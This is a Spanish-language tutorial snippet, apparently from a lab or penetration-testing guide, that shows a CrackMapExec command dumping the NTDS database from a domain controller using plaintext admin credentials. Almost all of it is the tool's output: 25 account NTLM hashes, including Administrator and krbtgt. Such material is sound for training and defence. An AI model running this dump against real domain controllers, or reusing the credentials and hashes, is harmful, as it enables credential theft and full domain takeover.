Utilizando CrackMapExec
Nosotros podemos utilizar CrackMapExec con el modulo NTDS para extraer las credenciales de la siguiente manera:
kali@kali=> ./cme smb 3.14.245.175 -u "admin" -p "Password@1" -d "spartancybersec.corp" --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] y
SMB 3.14.245.175 445 FIRST-DC [*] Windows 10.0 Build 17763 x64 (name:FIRST-DC) (domain:spartancybersec.corp) (signing:True) (SMBv1:False)
SMB 3.14.245.175 445 FIRST-DC [+] spartancybersec.corp\admin:Password@1 (Pwn3d!)
SMB 3.14.245.175 445 FIRST-DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 3.14.245.175 445 FIRST-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:c90fb8ae170b856da331fa40d5c11769:::
SMB 3.14.245.175 445 FIRST-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 3.14.245.175 445 FIRST-DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b44daa015f201fa31126895ebbcbbcab:::
SMB 3.14.245.175 445 FIRST-DC admin:1008:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC regular.user:1112:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC dnsadmin.user:1113:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC unconstrained.user:1114:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC constrained.user:1115:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC userwrite.user:1117:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC userall.user:1118:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC compwrite.user:1120:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC gpowrite.user:1121:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC lapsread.user:1122:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC groupwrite.user:1123:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC writedacldc.user:1124:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC readgmsa.user:1125:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC clearpass.user:1126:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC roast.user:1127:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC asrep.user:1128:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC spartancybersec.corp\adminwebserver:1130:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB 3.14.245.175 445 FIRST-DC FIRST-DC$:1009:aad3b435b51404eeaad3b435b51404ee:9e24232fd09fa4eb1fdf798597550a40:::
SMB 3.14.245.175 445 FIRST-DC Suspicious-PC$:1116:aad3b435b51404eeaad3b435b51404ee:d566c257631be77cde24694488ef337d:::
SMB 3.14.245.175 445 FIRST-DC USER-SERVER$:1129:aad3b435b51404eeaad3b435b51404ee:dadef894e564c991a5a5714e0a7efc67:::
SMB 3.14.245.175 445 FIRST-DC WEBSERVER$:1131:aad3b435b51404eeaad3b435b51404ee:449c5f226aff8a2af42ac07ebaf901cb:::
SMB 3.14.245.175 445 FIRST-DC VIKINGSCYBERSEC$:1119:aad3b435b51404eeaad3b435b51404ee:a9e60b71ecaab835b49ec6a56ca99af5:::
SMB 3.14.245.175 445 FIRST-DC [+] Dumped 25 NTDS hashes to /root/.cme/logs/FIRST-DC_3.14.245.175_2023-11-07_002407.ntds of which 20 were added to the databaseÚltima actualización